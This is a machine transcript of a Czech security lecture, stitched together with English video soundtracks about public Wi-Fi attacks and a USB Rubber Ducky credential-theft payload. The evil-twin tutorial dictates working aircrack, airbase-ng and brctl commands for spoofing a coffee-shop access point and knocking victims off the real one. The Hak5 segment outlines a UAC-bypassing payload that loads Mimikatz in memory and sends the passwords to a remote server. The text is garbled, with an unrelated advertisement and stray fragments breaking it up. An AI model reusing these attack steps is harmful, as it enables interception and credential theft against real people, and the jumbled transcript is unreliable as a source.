ze strany zaměstnanců, ale i ze strany v podstatě partnerů, protože vy v rámci organizace, v rámci perimetru, který je hraničen firewally, DLPčkama, Data Linkage Protection, nějakými porty monitorovanými a takhle, tak jste v podstatě velmi dobře chráněni proti 95-98% datových úniků. Tam, kde to vázne třeba, tak je komunikace s partnerama. Jo? Například, a to jsou všechno příklady z praxe, co dělám a co řeším každý den. Minulý týden unikly plány jedné banky. Jo? Včetně trezorových místností, počítacích místností na peníze a takhle. No se ptáte, jak to může uniknout, jo? Jako, nevím, jako takový ty plány, kde byla ta tloušťka betonu, v kolikátém patře, jakou bezpečnostní třídu mají ty pancířový ty dveře, kody jsou vedení obvody, jaká je rozvodná a tak dále.
Ale tak nic neříkejte, tak si sjedeme jakoby separátně, mě napadá společného projektu.
Jo.
Ty na to taky. Ale...
Jo, ale víte co, jako ono tohleto bylo na úložku, ty data.
Jak se tam může někdo dostat?
No,
z banky?
No, to víte z banky. Někdo z banky přidal tyhle materiály s tou zašifrovanou super secure metodou někomu externímu, což byly shodou okolností sádrokartonáři, kteří potřebovali tyhle ty plány k tomu, aby si mohli něco spočítat. No a oni se potkali s lidmi, kteří rozvádí klimatizace, si to mezi sebou nasdíleli přes Vložto. Jo? A tady prostě jako to je vždycky takový ten mindfuck, kterým chce jako trošku nabořit takovou tu vážnost a serióznost jako toho, co tady říkám a k čemu bychom se dostali posléze. Já to teď trošku poodhalím, ale to je přesně ono.
A jak se teda k tomu dostáváte vy, nebo jak jste to...
No, můj systém funguje tak, že my monitorujeme veškerý v úvozovkách datový úložiště, nezabezpečení FTP servery, datovými úložištěmi znamená otevřené linky na Dropbox, na Box, Uložto, e-disk a dalších 700 podobných služeb, které jsou na světě. Dále monitorujeme honeypoty hackerských for, kde monitorujeme, kdo co vlastně akorát ukradl za databáze, aby to mohl s náma nasdílet. No, my tam jsme v té grey zóně, v této oblasti, kdy zjišťujeme, kterých klientů se ty databáze se týkají, jestli tam náhodou není doména našeho klienta, pokud ano, tak zjišťujeme, jestli tam není třeba nějaký heslo, který by mohlo spadnout do té korporátní sítě. To bychom si všechno ještě ukázali.
To fungujete i na Darknetu teda?
Ano. My vlastně monitorujeme tu činnost, co se tam děje, co je novýho a co je pro nás zajímavý a co je potenciální riziko.
Tak abych to jakoby pochopil, takže vy jste tvůrci jakoby nějakého softwaru, jakoby nějakého etického hackerování.
Ano.
A ve chvíli, kdy něco jakoby odhalíte, tak tu společnost oslovíte, že máte tady ty informace a navážete s nějaký jakoby oficiální styk.
A nabídnete jim peníze za to, když vám dovolí?
Ne. To je vydírání. To nefunguje. My oslovíme, pomůžeme jim to smazat, všechno napravit a nic nechceme. Ale nezaručujeme, že se to nemůže stát znova a že je potřeba platit za ochranu. Jo.
Teď jsem konečně poznal, jaký je rozdíl ve vydírání.
Tak to jsou silný slova vydírání, ale je to prostě...
je to klasický biznis.
Jako takhle, jako, to je stejný jako antivirus.
Přesně.
To je prostě úplně stejný business case a jako víte co, můžete si do firmy zaplatit 5 lidí, kteří budou třeba, nevím,
dělat to samé, co děláte
denně
vy.
datlovat třeba na úložtu, jo, a takhle, než tam něco třeba, jo, stahovat všechny soubory, procházet je, jo, ale pak je tady dalších jako několik x desítek až stovek stránek, jo, nebo budou zkoušet IP adresy, jo, jestli na nějakém portu náhodou není otevřený nějaký komunikační kanál, jo, a takhle, jo. A jako, oni to budou všechno ručně procházet a vyhodnocovat a to taky trvá čas. My to máme udělané tak, že vlastně každých 5 minut běží skript na každém tom našem datovém úložišti nebo v tom místě, kde to pozorujeme, zeptáme se, co je tady novýho, ona nám odpoví tohleto, my to stáhneme, automaticky se zpracuje analýza toho obsahu, jo? Jestli se tam neobjevují klíčové slova našeho klienta, jestli se tam neobjevují barvy, ty jsou specifické pro našeho klienta, třeba taková ta typická T-Mobile růžová, jo? To je prostě geniální. Vy nepotřebujete žádný klíčový slova, když máte patentovanou barvu, kterou nemůže použít žádná jiná firma, jo? Jo. A tak dále. A nebo máte křivky, speciální křivky, které třeba jsou specifické pro nějaký logo, jo? A tak dále, a tak dále. Jo. Takže tohle je to, co mě v podstatě živí. A jdeme potom dál za nějaké další hranice, kdy se prostě monitorují, včetně jako souborů, tak se monitorují i nějaký třeba skupiny lidí, nějaké chování, jo, a tak dále. Kdy se prostě dělají nějaké vazby mezi nima a to už je spíš nějaká jako strategická bezpečnost, která jako v tomto funguje velmi dobře. A
já bych vám teďka poděkoval, myslím, že student tady ještě chvíli zůstane dneska a teďka bych se přesunul k tomu slajdu, co tam máme.
Chápu. Marketing se zvládnu. Dobrá, takže dneska se mi nepovedlo, bohužel cílem té ukázky dneska bylo to, že heslo, který má třeba do nějakých 8-10 znaků a v zipu rozlousnete takhle, protože tam je slabá šifra. Já to tady jenom rozjedu. Tak. Tady si překlikám na ten slide, kde to má být a dám to tak, jak to má být. No. Jako tohle to měla být ta tohle to měla být ta message, že se nám tam chtěl ukázat ten rád, jak to trvá dlouho, jak je to pomalý, jo, protože ty výpočetní výkony na AES 128 celou tou šifru jsou mnohem větší než na nějaký MD1, která prostě schroustá miliony operací za sekundu a tohle to schroustá desítky operací za sekundu. Takže AES je fakt minimum, teď se šifruje nějakým AES 1200 něco. Jo. A to byla prostě taková ta hlavní message, co tady jako měla zaznít. Nějaké bezpečné aplikace v uvozovkách, jak jsem mluvil, nějakou tu běžnou komunikaci, nebo běžnou takovou tu komunikaci, například já často jezdím do Asie a jedinou aplikaci pro komunikaci, kterou používám, je Signál, jo, protože je to takový kompromis mezi uživatelskou user experience, nějakou uživatelskou zkušeností a mezi nějakým zabezpečením. Jo. Takže tohle je aplikace, která je super, zároveň když si ji nainstalujete a dáte jim přístup do svého seznamu kontaktů, tak je velmi zajímavý pozorovat, kdo tu aplikaci má a kolik lidí vlastně v okruhu vašich, nevím tomu, známých má tendenci takhle šifrovaně komunikovat. Jo? To jako pro mě jako nějakého v úzovkách sociálního inženýra nebo člověka, který se zabývá tím security i z hlediska nějakého etického hackování, je strašně zajímavá informace, když vím, že tady ten člověk má potenciálně co skrývat, tak se můžeme na nějakým způsobem zaměřit a můžeme něco nějakým způsobem o něm zjistit víc a zkusit z něho dostat nějaké informace. Mám potom další prezentaci. Potom, pokud máte PCčka, šifrování hard disků nebo USBček, doporučuji Decrypt. Když někomu předáváte USBčko, kdy by vám někde vypadlo, ztratili jste to a tak je dobrý to mít zašifrovaný tady tím Decryptem, protože i z hlediska GDPR a přenosu třeba citlivých údajů je to potřeba mít takhle pořešené. Bezpečné připojení k bezdrátové síti. Tady asi vás nic nepřekvapí s tím, když vám řeknu, že na veřejnou síť ano, v případě, kdy si chcete zkontrolovat jízdní řád, ale chci vám ukázat, jak se na ní v uvozovkách připojit bezpečně, když už musíte. Jo? Já se osobně na veřejnou síť nepřipojuju, pokud to není nutné. A pokud ano, tak používám VPNku a hlídám si na jaké stránky vlastně jaké stránky mě zajímají a kam vlastně jdu. Jo. Tady byste vám chtěl ukázat takový příklad toho, jak vlastně, toho, jak funguje, nebo jak vypadá vaše komunikace z pohledu, jak jsem zvyklý z toho Macu. Tak, to tady nepříjemný.
Mac je teda počítač.
Jo. V pohodě.
Takhle to vypadá.
Tak jsem provedl takový video, kde vlastně vidíte takový jako vypadá to jako pro děti, jo, ale to je přesně.
Here's a short digital adventure with our friends, the Cyber Family. This episode is about wireless sniffing. Here we are at Stubbs Cafe. Stubbs Cafe is very popular, especially among younger customers. And this is David Cyber, the eldest child in the Cyber family. David has made a habit of stopping at Stubbs nearly every morning before his classes start at the university. He usually gets a cup of coffee and studies for about an hour. Because Stubbs Cafe has Wi-Fi, David will also connect to the internet and take care of any online business that he might have to take care of. But David isn't the only person connected to the Wi-Fi at Stubbs. One of the other network users is a cyber criminal named Eavesdropping Eve.
I'm listening.
Eavesdropping Eve has a program on her computer that allows her to view wireless traffic for any computer that's connected to the same network that she is. When Eve intercepts other people's wireless traffic, this is called wireless sniffing. It's important to realize that Eve doesn't have to be in Stubbs Cafe to connect to the wireless network at Stubbs. Under everyday conditions, most wireless routers can transmit in at least 100 feet in every direction. Here's what a broadcast radius of 100 feet looks like in comparison to a football field. Eve could sniff wireless traffic from a neighboring building or from across the street. Under especially good conditions, where there aren't many obstacles to block the radio waves, a wireless router might be able to broadcast up to 300 feet. So it's possible that Eve could sniff wireless traffic from the next block over. In fact, if eavesdropping Eve has special equipment, she might be able to detect a wireless router from thousands of feet away. So it's even possible that Eve could sniff wireless traffic from a different neighborhood in the same town. Why does it matter that Eve can intercept David's Wi-Fi traffic? Well, the problem is that Stubbs Cafe uses an unencrypted Wi-Fi signal. This is more convenient for customers because with unencrypted Wi-Fi, customers don't have to enter a password to connect to the internet. But it also means that the connection is unsecure. If the Wi-Fi signal were encrypted, then the connection would be scrambled in a special way so that only David's computer could read David's internet traffic. But because the Wi-Fi is unencrypted, the traffic is unscrambled. That means that Eve's computer is capable of reading David's internet traffic. This includes things like usernames and passwords. One day, David was at home and he remembered that he needed to check his bank statement. So David logged into his online bank account. Oh no! Somehow, somebody had gotten access to David's personal accounts. That person had pulled all of the money out of David's savings account, and they had also spent all of the credit available on his credit card. Because of this, David was in debt $5,000. Now, David has no idea who got into his personal business, and he's not sure how they did it, but knowing what we know, I think we have a pretty good idea of who is responsible.
Vlastně taková základní věc, kterou si musíte pamatovat, když se kamkoliv už v dnešní době je přihlašujete a dáváte tam nějaký svoje přihlašovací údaje, tak to je, jestli je tam HTTPS, jestli to je zelený.
Hey, what's up, friends? I got a sweet video for you today. Today in my apartment here, I'm going to simulate a Starbucks just so I can show you how easy it is for a hacker to gain access to your machine when you're connected to an unprotected network like one at a coffee shop or airport. So let's get started. I'm just going to locate my wireless card with an IF config. And I can see here my wireless card is WLAN 0. So I'm going to put this wireless card into monitor mode with this command, airmon-ng, space start, space WLAN 0. Let me see here, it gives us a new interface on Mon 0. This is our new monitor mode interface. So I'm going to use this new monitor mode interface with an arrow dump just to see all the networks around me. And I can see here I got a few networks around me, but I'm only interested in Starbucks. I can see I got Starbucks here. It's an open encryption running on channel 11, and this is the BSSID number of that access point. So I'm going to go ahead and see if there's any clients connected to Starbucks. And with this command here, I'm going to change my arrow dump to look like this, --BSSID, copy and paste, and -- channel 11. You also have to configure your new monitor mode interface to use channel 11. So I'm going to use this command, iwconfig mon0 channel 11, and exit that. And then just mon0 to finish this up. And I can see here that I have 2 clients connected to Starbucks, which is great. These 2 clients here are our new potential victims. So now that I got this information, I know there's people connected to Starbucks, I'm going to go ahead and make a fake access point. Or actually, it's a real access point, but it's a spoofed access point to look exactly like Starbucks. So I'm going to do airbase-ng --ESSID. I'm going to use the same ESSID as Starbucks, which is Starbucks. You could also spoof the BSSID and MAC address of the access point with a -A and then copy and paste. But for tutorial purposes, I'm just going to use a random BSSID number just so I can show you in real time what it looks like when a client disconnects from the real access point and connects to us. So you can see here, this is my random BSSID. I'm just going to do an IF config at 0, and I can confirm that I do indeed have a new interface at 0. So now I'm going to bridge this new interface with an interface that has internet connection. You are going to need a separate piece of equipment to pull this off. You're going to need independent internet source. The reason behind this, if you have a smartphone, you can just tether internet through that works just fine. The reason behind this is that we also want the client to have internet access so they have no idea the switch took place. So I'm just going to go ahead and add a bridge. I'm going to call it Starbucks Bridge. And then I'm going to add my interfaces to this bridge with brctl add if to Starbucks Bridge. The first interface is ETH0. This is the interface with internet access. And then brctl add if to Starbucks Bridge and at 0. So now I have my 2 interfaces on my bridge. I'm going to go ahead and bring up these interfaces. The IF config ETH0 up, and ifconfig at 0 up. And now that I got these two interfaces up, I can go ahead and bring up my bridge, which is ifconfig, and then your bridge name, which is mine is Starbucks bridge up. And I'm also just gonna enable IP forwarding on my kernel, so I can just so I know that packets are getting forwarded correctly. And I can do this rather easily with this single command here. And now that I have all this set up, I'm just going to open up Wireshark so I can show you in real time. And you see here Wireshark picked up my new interface, Starbucks bridge, so I'm going to start sniffing on that new interface. And you see here that I'm getting traffic rather quickly, so I know that it's working. I'm just going to minimize this. Now that I know that everything's working, the next step is to get clients to connect to us. I am just going to open an arrow dump real quick so I can show you guys the difference between the real access point and my spoofed access point. You see here, there are two Starbucks now, one with the original BSSID and one with our new spoofed. So I'm going to go ahead and do an arrow dump on our new interface just so I can show you what it looks like when a client connects to us. So I'm going to change my arrow dump command to look similar to the one before, but we're going to use our BSSID. And then dash channel 11, mon 0. And now we're just picking up clients on this network. Now that this is all set up, all I have to do is de-authenticate everybody in the real access point, forcing them to look for a Starbucks, and I just so happen to have an interface called Starbucks, so when they de-authenticate from this network, assuming I'm closer to the client is just going to connect to me instead. Or if I really wanted to be tricky, I'm going to do this. I'm just going to do this. I'm going to send a denial of service to the real access point of Starbucks, causing the entire network to de-authenticate, and then they're going to look for a Starbucks to re-authenticate to, and I just so happen to have a Starbucks. So here, in this example, we're going to own the entire network with doing this. And we see here, rather quickly, we got both clients connected to Starbucks. If there were more clients, we would have got all of them. So, but I only got 2 laptops to play around with. So, and we see here in our Wireshark, we are just gathering packets left and right. We're getting IP addresses. I'm just going to type in an HTTP filter because I'm only interested in web traffic for this tutorial. And we can see here that we succeeded in our attack. We're getting IP addresses of our victim, which otherwise we couldn't ping because they're behind a firewall. So this is a great way to get past a firewall if you need to get IP addresses. And the whole reason behind this is that we set up a fake access point, and now our client is connected to us before they connect to the internet, allowing us to view all traffic between us and our victim. We also have full control over this network. We can start sending in packets. We can start viewing packets or sniffing packets, more or less. And or we can start DNS spoofing and make fake websites with SQL entries to get whatever information we want. Or we can start port scanning, vulnerability scanning. But for the purpose of this tutorial, I don't think it's a really good idea to show everybody how to hack into computers at Starbucks. So I'm just going to end it right here. If you're truly interested, hit me up in private. I'd love to show you how to do this. If you watched my exploding remote webcam video, you should have a very solid understanding on where to take it from here. So thanks again for watching, and happy hacking.
Několik desítek tisíc lidí až milionů nebo několik desítek tisíc počítačů přistupuje najednou na stránky a tím je zablokují a jsou zablokované, dokud ten člověk třeba něco nezaplatí nebo
Decathlon. Děláme sport dostupnější. Hello there, my name's Gary Sims from Android Authority. Now, if you've watched my videos about VPNs or about encryption, you'll have noticed that I've said several times that we must be careful when using public open Wi-Fi hotspots. Now, the reason for that is because the information, the data that's sent from your smartphone or from your laptop to the access point is actually broadcast in every direction for anybody to collect and to analyze. And so therefore that obviously poses a whole bunch of different problems. But the question is, how easy is it to actually collect data, collect network packets on a public open Wi-Fi system? Well, let me explain. So when you connect to a public open Wi-Fi, the connection between your device and the Wi-Fi router is in the clear, it's not encrypted. And that's because people want you to connect to it, to use it while you're in their shopping mall or in their coffee shop, for example. And therefore the data that's sent is completely open. And as I said a moment ago, it's sent in every direction. It's not just sent kind of like directly in the line of sight of the router. And if you have the right equipment, anybody can pick up all those data packets that are floating around in the air. Now, normally a Wi-Fi adapter, whether it's one for built into your laptop, built into your phone, or one that you use through USB, is in what they call managed mode. And that basically means it just wants to talk to a Wi-Fi hotspot, it wants to send and receive data, and it's not really interested in anything else that's going on. However, the Wi-Fi standard allows these chipsets to be put into several other modes, and one of them is called monitor mode. Now, in monitor mode, the Wi-Fi chipset can actually pick up and receive the packets that are going anywhere in the air. Whether they're going to the guy on the table next to you, whether they're going to the guy who's down the shopping mall a little bit, you can receive all of them because Wi-Fi signals are pervasive. They go absolutely everywhere when they are sent out. Now, not all Wi-Fi chipsets can do this. It's cheaper just to make that just stick where logic is much simpler, and that's actually the kind of the 99% use case that people just want to connect to a hotspot and to send and receive traffic. However, if you get your hands on the right piece of equipment, then actually you can put it into monitor mode. Now, for example, I have here a dongle that I bought from Amazon. You can get it for under $20. It's by TP-Link, and it actually has the right drivers that you can set this thing into monitor mode. Now, to do this, you're going to need a thing called Kali Linux. It's a special Linux distribution, but you don't have to install it on a laptop and then kind of over-install Windows or anything like that. You can run it as a virtual machine. And if you run it as a virtual machine, you can then plug in the USB adapter, and you can actually associate it with the Linux distribution, and it's like you're running on a separate machine. It's a virtual machine. Now, I've done some testing using my laptop and using a virtual machine for Kali Linux, and everything I'm going to tell you now is actually what I've done myself, and step by step I've actually proved that this works. Now, rather than give you all the actual commands here during the video, which will be hard for you to follow, go over to the AndroidAuthority.com website and look at the article that goes to this video, because there I've listed all the commands that you need, and they're easy there for you to cut and paste and to read and to study to see what I'm doing. But basically, you first of all, you boot up Kali Linux, and then you plug in your USB adapter, you make sure it can be seen, and then you switch the adapter into monitor mode, and you use some tools from the AirCrack suite to do that. And then once you've found the Wi-Fi network that you want to listen to, you then basically just say to the AirCrack suite, use this Wi-Fi adapter to just capture all the packets that are going around in the air, and they will be captured onto your hard disk. And then once they're on your hard disk, you can use tools like DriftNet and Wireshark to examine all of that data and see what's there. Now, very quickly you'll be able to grab out some URLs so you can see what websites people have been visiting, and you'll also be able to grab any pictures that have been flowing around in the air to see what people have been viewing. Now, to test this, I put my own Wi-Fi hotspot here in my house. It was completely open, so maybe for a few days my neighbours were able to get a bit of free internet access, but I'm sure they've all got internet access anyway. And basically I use one laptop connected to that Wi-Fi hotspot, and I use my Android phone connected to that hotspot, and then I use my laptop running Kali Linux along with this Wi-Fi adapter, and I just captured all of the stuff that was going out. And you can actually find that you can pretty get hold of a lot of information. Particularly, for example, I went to a particular football website, soccer for those in North America, and all the player pictures that I was downloading and looking at, I've now grabbed from the Wi-Fi dongle, and it's actually, I've got it stored on my hard drive, and I wasn't even connected to the same Wi-Fi router. That's the beauty of monitor mode. You can actually just grab things out of the air as they're whizzing past. Now obviously, if this was the case for absolutely everything, it would be a disaster. Every email you read, every time you went somewhere, to instant messaging, everything would be open. Now thankfully, there is this thing called HTTPS. You've probably seen it when you type in a URL, and when you go to a website that's using HTTPS, you'll see that little padlock sign. Now the S and the padlock sign are showing that this is secure. It's an encrypted connection. So even if the packets are flying around in the air freely between your device and the Wi-Fi hotspot, once those packets have been grabbed from the air, if you have a look inside of them, it's all gobbledygook because it's encrypted and you can't see what's in there. So all the pictures are encrypted, all the URLs are encrypted, all your emails are encrypted, and so on. And that's great. Now, S now is, and that's thanks to projects like the Let's Encrypt project, and also the free availability of, or the relatively free availability of SSL certificates. Now what that means is that when you connect to a website, and Google for example, for their search and for everything that you do on Google, including Gmail, it's all over HTTPS. So whatever you're reading on Google, whatever you're searching on Google can't be seen when you're on a public free Wi-Fi hotspot. However, many sites only use HTTPS when you're doing the login, so at least your password's protected, and when you're doing the kind of the checkout with what you've purchased, if it's a commercial site. So that's covered as well. But in between time, when you're browsing all the different products, they are freely available because they're in the clear. However, that's changing, and Google have a report card available which kind of gives you a list of all of the sites that use HTTPS from end to end. So things are really improving on the web browser front, and of course you've got that little icon that tells you whether you're connected securely. However, things aren't quite as simple when it comes to Android apps. Whenever you use an Android app and it's getting data, it might be getting advert data, it might be sending some personal profile data about you, you might be using a network service, whether it be social media, whether it be instant messaging, or whether it may be multiplayer gaming, whatever you're doing, you don't know whether that connection is an encrypted connection. And that's because there is no little padlock sign, there is no little green sign to tell you that everything's going okay. You just have to trust that app, and not all apps by any measure use encryption during the networking part of their design. Now, unfortunately, there's no easy way of telling which apps do and which apps don't. You actually have to sit down with a Wi-Fi adapter like I've got and start to monitor this traffic and see what's available, and that's obviously time consuming. Now, some people have written reports about this and they are out there to find. However, it's really a problem. We can't find out quickly whether an app uses encryption or not. Now, if we take an app like WhatsApp, they have declared publicly, and it even says so in the app, that everything that you do over WhatsApp is encrypted. So even if I'm using it on a public Wi-Fi hotspot, then it will be encrypted. It doesn't matter if someone grabs all those packets out of the air, you can't see what's inside of them. However, other apps like Google's Allo Messenger has clearly stated it doesn't use encryption, only when you're in incognito mode. Now, I haven't tested it to see how bad that situation really is, but it is interesting that even popular apps by big companies aren't necessarily using encryption. For when you're using an app on your phone, be sure that you're 100% you know that it's using encryption, otherwise it could be stolen when you're connected to a Wi-Fi hotspot. Things out of the air is one thing that can happen on a Wi-Fi hotspot, but it's not the only thing that can happen on a Wi-Fi hotspot. B is people can set up rogue access points, fake access points, deliberate in, so that you connect to control over your traffic. So for example, maybe you go to a particular coffee shop and it doesn't have Wi-Fi, and then one one day you see that it does. You go, oh great, the shop's got Wi-Fi, I'm so happy, I've wanted them to have Wi-Fi for a long time. And actually it's not. There's a guy 2 tables down with his laptop and with a Wi-Fi adapter like the one that I've got, and he set up his own access point. All the tools for that are available on Linux distributions like Kali Linux that I mentioned earlier on. And then what happens is everything that you send to the internet actually goes to his laptop first, where he can store it, and he can also manipulate it, and worst of all, he can redirect it. So you think you're going to Amazon.com, and in fact what comes up is a website that looks very similar. In fact, it's a clone of Amazon.com, but really it's a fake website that he put up deliberately just to capture your login password. So you then go and log in, it says login failed, and then it will probably redirect you to the real website where you log in and go, oh, I must have typed in the password wrong. But actually, you've now given him your username and password. So that's a danger of using untrusted Wi-Fi access points. And that's the problem. When you go to a shopping mall, there might be like 10, 20, 30, 40 different Wi-Fi networks listed, okay? And some of them are open, some of them are not, and they all look legitimate because they're all names of the shops that are around you. And you think, oh, well, I'll connect to the Starbucks network, I'll connect to the whatever network, and actually there could be a guy sitting on the bench behind you who set up that Wi-Fi network, so be careful. And there's a third thing that can happen when you connect to public Wi-Fi, and that is a thing called ARP spoofing. Now, every single network card in the world has a thing called a MAC address. Even this thing has a MAC address, and that's the media access control address, and it's unique. They're established in the factory when it goes out of the door, and every one in the world is different. Whether it's a PC, whether it's a laptop, whether it's an adapter like this, whether it's your smartphone, they've all got these unique addresses on them. And what happens is when you have an IP address, that's the internet address, what happens is that another PC or another device says, hey, who owns this address? And it uses the ARP, the address resolution protocol, to say who owns it, and then it says I do, and the MAC address is sent back. Now in a normal secure environment, that's absolutely perfect, and that's how it works. But actually, when you're on an open public, you can spoof that. So someone comes along and says, hey, who owns this address? And you say, I do, but you don't. You don't own it at all, but you lie. You get your PC to lie about the fact that it owns the address, and that means now traffic that was going to go to one place, probably the router, now comes to you. And once it comes to you, again, you can then do lots of different things like phishing attacks, man-in-the-middle attacks. You can actually set it up so that all the data is restored on you, and then you somewhere else. If they're going somewhere simple, like a news website, you just redirect them. If they're going to somewhere that you're interested in their passwords, PayPal, eBay, Amazon, whatever, to a fake site, do a phishing attack on them to try to capture their username and password. So there's 3 things that can happen. You can capture the packets out of the air using monitor mode on the Wi-Fi adapter. You can set up a fake Wi-Fi hotspot to lure people in and then to capture their information. And ARP spoofing allows people on open Wi-Fi networks to redirect traffic, and you really are not even none the wiser about what's going on. And then with web browsers, we must be careful that we're using HTTPS, that you've got that sign up there on the padlock sign, the little green box saying everything is okay. But on Android apps, it's much harder to know whether the app is using SSL or not. So be careful, unless it's something like WhatsApp or other apps that have declared publicly that they're using encryption. Be careful when using those apps over an open network. Well, my name is Gary Sims from Android Authority. I hope you enjoyed this video. If you did, please do give it a thumbs up. If you want the tutorial about how to do these things, the exact commands you need to type into Kali Linux to replicate what I've been doing, go over to the AndroidAuthority.com website and find the written article. It's got all of the things listed for you there. Don't forget to subscribe to Android Authority's YouTube. Don't forget to download our Android Authority app, because that will give you access to all of our latest news directly on your mobile phone. And don't forget, daily you should go to AndroidAuthority.com, because we are your source for all things Android.
Že opravdu jako o všechno přijdete. Tady potom je tady jako...
Ne, se domůže.
On sám o sobě nevěděl, kdo je,
Can you social engineer your target into plugging in a USB drive? How about distracting him for the briefest of moments? As we saw recently on Mr. Robot, 15 seconds and a USB rubber ducky is all it takes to swipe passwords from an unattended PC. In honor of this appearance, we are covering 15-second password hacks, Mr. Robot style, pilfering passwords with the USB rubber ducky. Hello everyone, and welcome to this episode.
I do that part.
Who runs the show?
I do. It's my show.
I run this show. Hey everyone, welcome to this episode of Hack 5. This is your weekly dose of technoloss. My name is Shannon Morris.
I'm her co-host, Darren Kitchen. It's a pleasure to be here, Shannon. It's a very exciting week for us.
It is. You know why?
Yes, I do, because it's written right there. It says that we did a cameo on Mr. Robot.
We did. So Hack 5 had a cameo on Mr. Robot recently with the appearance of our USB rubber ducky, which was super, super cool. They even called out by name Rubber Duck.
Right? How exciting is that? In fact, I have it right here. I'm just going to go ahead and do it. Because this is fair use, right? I think so.
Yeah, it's fair use.
Yeah, so it's like, hey.
This is a rubber ducky. All else fails. You find an FBI laptop anywhere on the floor. They're usually Panasonic Toughbooks. Plug this guy in. Wait 15 seconds, then yank it. Okay? Next to a tool called Mimikatz, it'll pull all cache passwords and domain info in and save them on this.
So
awesome!
Right?
We're not going to get a takedown for that.
No, I don't think so. In fact,
I mean, if they did,
I would say
really...
in honor of this appearance, we're going to go ahead and recreate showing how each malware and exfiltrate data with the USB rubber ducky. Yes, because that was really cool that they showed off a real hack.
It was a real hack. So the payload that was mentioned on the show is called the Twin Duck Mimikatz that was shown off by us in season 15, episode 3. So check that episode out for the technique. It saves the passwords back to the duck. We'll put the link in the show notes, and I believe we can stick a card thing over here, so I'll put a card up there.
Nice. So if you're new to this and you haven't been following along for a while, the USB rubber ducky is the first keystroke injection attack tool. It's this little guy. We invented this in 2010. Yay. It looks like a USB drive. It smells like a USB drive.
Did you really just sniff it?
I did, yeah, because I don't bite them like you.
Oh,
does it taste like a USB drive? Anyway, it types like a keyboard, though. It types over 1,000
It actually does not taste very good.
You want to try the PCB instead? This is actually what's inside it. It's not a regular thumb drive. It's a keyboard. It's a keyboard emulator. So it types over 1,000 words per minute, and it types these specially crafted payloads practically mimic the user, entering these keystrokes into the computer at superhuman speeds, and that means that anybody with social engineering or physical access skills can go ahead and deploy these duck payloads as long as you can find a free moment with their target's computer.
Which we all know plenty of those happen.
Oh yes. In fact, if you'll come to Pen Test with Hack 5, shenanigans is all I'm gonna say.
Whatever, Brenda.
Right? Okay. Moving on.
Basically, it's a tool that violates the inherent trust that computers have in humans, since we as humans primarily communicate with computers using keyboards and sometimes computer mouses. So in essence, computers trust the USB rubber ducky because they just think, oh, it's a keyboard.
Right. I mean,
cool.
I guess technically it's a HID attack. It's a violation of the Human Interface Device Specification, which includes keyboards, mice, joysticks, things of that nature. And we're just emulating those humans, because if I had 30 minutes with your computer, yeah, I could totally own it, but I don't have 30 minutes. I've got 30 seconds while I distract you, so I've pre-programmed the attack.
While you're getting something out of the printer.
Mm-hmm. So we're actually going to take this a step further, because we've already covered the method that they used on the show, or mentioned on the show, that Mimikatz that saves it back to the disk. That's this one on season 15, episode 3, so highly recommend check that out. But instead, we're going to be using a variant.
So the variant is called?
So it's a variant on Mimikatz, which if you're not familiar, it's by Gentle Kiwi, and it's a tool that dumps clear text credentials out of memory from Windows, as opposed to the older technique, which I believe we've even covered in back in season 5, where you would dump hashes and then crack those hashes. So NTLM and LM hashes, and then run cracking tools. With this, Gentle Kiwi's tool Mimikatz just pulls the actual plain text password right out of memory, so you don't even need to crack the hashes, although it also gives you the hashes and all these other awesome credentials. So it's a fantastic tool.
So the full name is Invoke Mimikatz.
That's the variant by Climber. I hope I'm pronouncing that right. It's in leet speak. And that invoke Mimikatz variant is one written in PowerShell, which goes ahead and which is fantastic because that's like been built into Windows since Windows 7, and it injects Mimikatz directly into memory, so it never touches the disk, which means that there's nothing for like antivirus to like find a file on the computer. Anyway,
so what
really
these
cool.
are doing is they're going directly to the RAM, to your memory, and messing around with RAM. So they don't even touch any files with like saved passwords or anything like that. It's just the passwords that are saved on your RAM.
Exactly.
That's so cool. And you've further altered a method by our friend Mubix as well. So Mubix does Metasploit Minute. He sent us this cool alteration to pull the script from a web server using PowerShell too.
Right, so when we're done with this, we've made a little alteration, and basically when this is done, when we're ready to deploy this, what it's going to do is this payload will go ahead and open an admin command prompt bypassing UAC. We're going to do a little obfuscation. We're going to download and execute invoke Mimikatz into memory. We're going to go ahead and run that, getting those clear text passwords. Then we're going to send those passwords back up to our own server up in the cloud so we can store them for later enjoyment. And when it's all said and done, you're basically just going to have a USB drive that you can plug into any computer and in 15 seconds own it.
So cool.
This is going to be fun.
And luckily this does not take that many things. So what you'll need to pull off this attack are, of course, any web server on the internet with PHP, and preferably something mostly anonymous.
Won't be on this segment.
The USB rubber ducky, of course, the ducky script payload, invoke Mimikatz PowerShell file, and credential saving PHP scripts. And all of those we are going to be showing off today. And everything we've luckily covered in a very nicely documented blog article posted by Darren over at hak5.org, so you can read along with this as well.
Yeah, it's going to be fun.
So let's go ahead and begin with step one, which is writing the payload.
So we should probably talk about how ducky payloads are put together, and I'm going to switch over to my my Kali machine so we can kind of get into that. So essentially the USB rubber ducky scripts are written in what I like to call a ducky script. It's a very simple, it's ridiculously simple, the scripting language that can be written in any regular text editor, whether it's Notepad or Vi or Emacs.
Which is actually VI.
No,
it's VI.
Well, or it's Vim, but
no, it's VI.
Is it
like,
VI?
That's how it's pronounced. The original creator, VI, not Vi.
I learn something new every day.
I love it when I can teach Darren kitchen things.
Well, I'm going to use Nano because I like Nano so much that I named a pineapple after it. Anyway, any text editor, and I'm going to go ahead and break down this script into 5 different sections. The very first being to cool your jets, right? Okay, so the first thing we're going to do is start with a little rem. And rem is short for remark, and this comes from BASIC. In other programming languages, you may have like 2 slashes or a semicolon or things of that nature. And really all I want to do here is just kind of give it a title and an author, and hey, give mad props to the shoulders of the giants of the people which we are standing upon. That sentence made sense to me. But essentially the most important part at this very beginning stage is to do a delay 1000. And what that means is we're going to just chill out for 1000 milliseconds.
And that's 1 second, right?
Obviously, and that just means that we're...
byly případy, kde prostě změnili nebo nedokázali jakoby s tím tankerem jako vůbec odplout, nebo tam zvýšili otáčky a prostě on...
You never know, right?
Yeah,
I mean,
you never know.
If you just plug in and immediately start sending keystrokes within the millisecond, it'll be like, oh, a keyboard, and then you've already typed like a whole sentence. So yeah, you just don't want to miss it.
Okay.
And of course, like if you're hacking a 486, you're gonna put in some more delays.
You still use a 486?
You know, my boy Strongbad does.
A little kid banging on the keyboard. I don't know what I'm doing.
You know what? I'm thinking a Lappy 386.
Yeah.
Scroll button and a Lappy together last. How you learn
Okay,
to
so what do we do
fast?
next?
